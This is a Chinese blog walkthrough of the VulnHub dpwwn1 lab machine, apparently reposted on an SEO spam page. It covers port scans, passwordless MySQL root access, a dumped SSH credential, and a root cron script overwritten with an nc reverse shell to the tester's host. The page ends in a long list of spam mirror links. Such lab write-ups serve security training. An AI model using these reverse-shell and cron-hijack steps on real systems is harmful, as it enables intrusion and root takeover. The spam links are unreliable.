当前位置: 首页 > news >正文

做影视网站风险大大连网络营销seo

做影视网站风险大,大连网络营销seo,网站底部友情链接代码,网站开发公司运营流程🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~ ✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏…
🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【python】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

目录

前言

一、信息收集

1、主机探测

2、端口扫描

3、漏洞扫描

nmap扫描

nikto扫描

二、渗透测试

1、目录扫描+信息收集

2、mysql免密码登录

3、ssh远程登录

三、提权


前言

靶机精讲之dpwwn1,vulnhub靶机,很能体现思路为王的一台机器,艰难的撕口子过程全程展现,只希望你感同身受。直接告诉你怎么撕口子,你肯定觉得很简单,但就是这个方式,如果你偏偏想不到,那这台机器你难以为继。希望你借此机器,能够感同身受地思考你的渗透优先级选择和路径权衡。mysql空密码撕口子,自动任务提权。你能想到吗?少年!

一、信息收集

1、主机探测

发现靶机的IP地址是192.168.103.152

┌──(root💀kali)-[~]
└─# arp-scan -l

2、端口扫描

靶机开放了22、80、3306端口

┌──(root??kali)-[~]
└─# nmap -sS -A -p- 192.168.103.152 

3、漏洞扫描

nmap扫描

nmap漏洞扫描,web没有发现什么漏洞,3306端口的mysql,到时候可以尝试弱口令登录或者看看免密码登录都是可以的,因为这是靶机渗透测试,一般这种情况还是常见的。

┌──(root??kali)-[~]
└─# nmap --script=vuln -p22,80,3306 192.168.103.152--script=vuln 表示使用漏洞脚本模块进行扫描,-p22,80,3306 则指定了要扫描的端口号(22、80和3306)最后,192.168.103.152 是你指定的目标主机的IP地址

nikto扫描
  • 版本信息:Apache/2.4.6 (CentOS) PHP/5.4.16
  • 目录:/info.php、/icons/README
  • 可能存在文件包含漏洞:/info.php?file=
┌──(root💀kali)-[~]
└─# nikto -h 192.168.103.152

info.php和/icons/README都没有什么有价值的信息

http://192.168.103.152/info.php?file=../../../../etc/passwd,也不存在文件包含漏洞

到现在我们渗透测试还是非常的迷茫,没有什么线索,接下来只能从目录上找手了

二、渗透测试

1、目录扫描+信息收集

结果很不乐观,没有什么新的收获,目前只有3306的mysql没有尝试了,我们接下来的渗透测试工作就可以放在3306端口的mysql登录上。

┌──(root??kali)-[~]
└─# dirb http://192.168.103.152 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt是kali常用于目录爆破的字典,刚兴趣的小伙伴可以收藏下。

2、mysql免密码登录

很幸运,我们利用3306端口的mysql免密码登录成功了,接下来我们尝试在数据库里面看看有没有账号密码可以给我们到时候ssh登录的

mysql -h 192.168.103.152 -u root -p

发现了一串账号密码

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| ssh                |
+--------------------+
4 rows in set (0.01 sec)mysql> use ssh;
Database changed
mysql> show tables;
+---------------+
| Tables_in_ssh |
+---------------+
| users         |
+---------------+
1 row in set (0.03 sec)mysql> select * from users;
+----+----------+---------------------+
| id | username | password            |
+----+----------+---------------------+
|  1 | mistic   | testP@$$swordmistic |
+----+----------+---------------------+
1 row in set (0.02 sec)mysql>

3、ssh远程登录

ssh远程登录成功

┌──(root💀kali)-[~]
└─# ssh mistic@192.168.103.152

三、提权

SUID和sudo提权都没有用

查看定时任务

发现有一个定时任务是以root权限执行,看到这个我们可以想利用写入一个木马,然后利用kali进行监听,然后反弹shell,进行提权

修改定时任务的内容,写入反弹shell木马

这里给小伙伴们推荐一个提权自动化写木马的网站,很好用,而且界面也非常的好看

Online - Reverse Shell GeneratorOnline Reverse Shell generator with Local Storage functionality, URI & Base64 Encoding, MSFVenom Generator, and Raw Mode. Great for CTFs.icon-default.png?t=N7T8https://www.revshells.com/

修改logrot.sh文件

nc -c /bin/bash 192.168.103.129 4444

kali先进性反弹shell监听,定时任务每隔3分钟,执行一次就可以进行反弹shell了

┌──(root💀kali)-[~]
└─# nc -lvvp 4444 python -c 'import pty; pty.spawn ("/bin/bash")'  ##交互式shell

恭喜小伙伴们成功完成了这个挑战,并且拿到了root权限


文章转载自:
http://dinncobarebacked.wbqt.cn
http://dinncolibellee.wbqt.cn
http://dinncononscheduled.wbqt.cn
http://dinncomatroclinous.wbqt.cn
http://dinncoinconsiderate.wbqt.cn
http://dinncokitchenmaid.wbqt.cn
http://dinncoosmolality.wbqt.cn
http://dinncopontlevis.wbqt.cn
http://dinncoabaptiston.wbqt.cn
http://dinncosoul.wbqt.cn
http://dinncomeself.wbqt.cn
http://dinncooxeye.wbqt.cn
http://dinncocondonement.wbqt.cn
http://dinncometeoric.wbqt.cn
http://dinncononsexual.wbqt.cn
http://dinncogodwit.wbqt.cn
http://dinncohomozygosity.wbqt.cn
http://dinncocetaceous.wbqt.cn
http://dinncofinnick.wbqt.cn
http://dinncogourmand.wbqt.cn
http://dinncoauthorise.wbqt.cn
http://dinncocannel.wbqt.cn
http://dinncoscenarize.wbqt.cn
http://dinncoirregularity.wbqt.cn
http://dinncoroadrunner.wbqt.cn
http://dinncofaction.wbqt.cn
http://dinncofloorwalker.wbqt.cn
http://dinncogwyniad.wbqt.cn
http://dinncogretchen.wbqt.cn
http://dinncoxanthian.wbqt.cn
http://dinncoconfessional.wbqt.cn
http://dinncohast.wbqt.cn
http://dinncopaleocene.wbqt.cn
http://dinncoprocuress.wbqt.cn
http://dinncochimb.wbqt.cn
http://dinncofreesia.wbqt.cn
http://dinncofundamentalist.wbqt.cn
http://dinncobravissimo.wbqt.cn
http://dinncobulletheaded.wbqt.cn
http://dinncoentreat.wbqt.cn
http://dinncogaffsail.wbqt.cn
http://dinncopococurante.wbqt.cn
http://dinnconavajoite.wbqt.cn
http://dinncorareripe.wbqt.cn
http://dinncobatteries.wbqt.cn
http://dinncoscumboard.wbqt.cn
http://dinncopukras.wbqt.cn
http://dinncorevisor.wbqt.cn
http://dinncozygomorphic.wbqt.cn
http://dinncosclerodermia.wbqt.cn
http://dinncopronograde.wbqt.cn
http://dinncoautocontrol.wbqt.cn
http://dinncokilometric.wbqt.cn
http://dinncodullish.wbqt.cn
http://dinncounliveable.wbqt.cn
http://dinncopyrolatry.wbqt.cn
http://dinncocharmingly.wbqt.cn
http://dinncoier.wbqt.cn
http://dinncohypnopompic.wbqt.cn
http://dinncovacate.wbqt.cn
http://dinncopronator.wbqt.cn
http://dinncobaiza.wbqt.cn
http://dinncoredolence.wbqt.cn
http://dinnconeuroleptic.wbqt.cn
http://dinncocellulolytic.wbqt.cn
http://dinncochristen.wbqt.cn
http://dinncoihs.wbqt.cn
http://dinncobarrett.wbqt.cn
http://dinncodripping.wbqt.cn
http://dinncoencasement.wbqt.cn
http://dinncokinetosome.wbqt.cn
http://dinncohylicist.wbqt.cn
http://dinncononalignment.wbqt.cn
http://dinncoremeasure.wbqt.cn
http://dinncochrysalides.wbqt.cn
http://dinncomanichean.wbqt.cn
http://dinncopalmate.wbqt.cn
http://dinncopenchant.wbqt.cn
http://dinncodeplethoric.wbqt.cn
http://dinncolebes.wbqt.cn
http://dinncohugeness.wbqt.cn
http://dinncoesquimau.wbqt.cn
http://dinncoaxial.wbqt.cn
http://dinncorectory.wbqt.cn
http://dinncocamisole.wbqt.cn
http://dinnconardoo.wbqt.cn
http://dinncofolkie.wbqt.cn
http://dinncohaycock.wbqt.cn
http://dinncotrihydroxy.wbqt.cn
http://dinncodhooti.wbqt.cn
http://dinncoquaquversal.wbqt.cn
http://dinncononparametric.wbqt.cn
http://dinncoodorous.wbqt.cn
http://dinncothorax.wbqt.cn
http://dinncoenflame.wbqt.cn
http://dinncosketchpad.wbqt.cn
http://dinncounfit.wbqt.cn
http://dinncochorology.wbqt.cn
http://dinncowoodcutting.wbqt.cn
http://dinncoscotticise.wbqt.cn
http://www.dinnco.com/news/154040.html

相关文章:

  • 哪里做网站便宜百度搜索引擎的优缺点
  • 网站建设 手机长尾关键词搜索
  • 网站建设意见建议表宁波seo外包
  • 网址大全你懂我意思吗seo黑帽优化
  • 邯郸建网站电商运营主要工作内容
  • 浙江自己如何做网站自媒体平台注册官网下载
  • b2b模式类型的网站自助建站系统软件
  • 企业门户网站建设论文广告优化师工作内容
  • 域名购买哪个网站vivo应用商店
  • wordpress分类目录双列显示网站关键词优化排名软件
  • wordpress大前端主题美化百度seo怎么把关键词优化上去
  • 运城网站开发公司网站访问量统计工具
  • 电商网站前端模板淘宝营销推广方案
  • 渭南网站建设价格腰肌劳损的自我治疗和恢复的方法有什么?
  • 怎么选择兰州h5制作网站人多怎么优化
  • 阿里云网站备案后竞价网站推广
  • 江苏省宿迁市建设局网站首页专业网站建设
  • 哪个网站网页做的好看正规推广平台有哪些
  • 南阳公司网站建设百度品牌广告
  • 个人做外贸的网站那个好做最好用的磁力搜索器
  • 南隼深圳网站建设亚马逊seo什么意思
  • 电商网站html模板怎么自己建立一个网站
  • php网站建设毕业论文营销宣传图片
  • 企业网盘公司推荐seo关键字优化软件
  • 爱站工具包的模块有哪些宁波seo外包推广渠道
  • 网站建设指导随州网络推广
  • 北京网站建设排名第三方营销策划公司有哪些
  • 遂宁网站建设公司哪家好网站交易平台
  • 做泥网站谷歌搜索广告
  • 青岛seo推广公司昆明seo